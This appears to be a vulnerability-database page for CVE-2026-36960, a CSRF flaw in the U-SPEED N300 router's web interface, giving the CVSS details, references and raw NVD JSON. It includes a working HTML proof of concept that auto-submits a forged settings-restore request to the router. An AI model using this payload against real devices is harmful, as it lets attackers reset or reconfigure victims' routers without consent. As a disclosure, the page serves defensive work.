CVE-2026-36960

Description

A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Rounter V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

U-SPEED N300 Rounter V1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CSRF vulnerability in U-SPEED N300 Rounter V1.0.0 -->
<!-- This HTML page simulates a request to change router settings -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://<ROUTER_IP>/goform/SysToolRestore" method="POST">
      <input type="hidden" name="SETTINGS" value="RESTORE" />
      <input type="hidden" name="CURRENT_PAGE" value="index" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Automatically submit the form when the victim loads the page
      document.forms[0].submit();
    </script>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-36960
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-36960
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-36960/
[4] VulDB https://vuldb.com/cve/CVE-2026-36960
[5] http://u-speed.com
[6] https://github.com/kirubel-cve/CVE-2026-36960
[7] https://github.com/kirubel-cve/CVE-2026-36960

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-36960", "sourceIdentifier": "[email protected]", "published": "2026-04-30T16:16:43.300", "lastModified": "2026-04-30T17:16:31.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) vulnerability exists in the web management interface of the U-SPEED N300 Rounter V1.0.0. The device does not implement CSRF protection mechanisms such as anti-CSRF tokens or strict Origin/Referer validation for administrative API endpoints. An attacker can craft a malicious webpage that sends forged HTTP requests to configuration endpoints. If an authenticated administrator visits the malicious webpage, the victim's browser automatically includes the valid session cookie in the request, allowing the router to process the request as a legitimate administrative action."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "http://u-speed.com", "source": "[email protected]"}, {"url": "https://github.com/kirubel-cve/CVE-2026-36960", "source": "[email protected]"}, {"url": "https://github.com/kirubel-cve/CVE-2026-36960", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}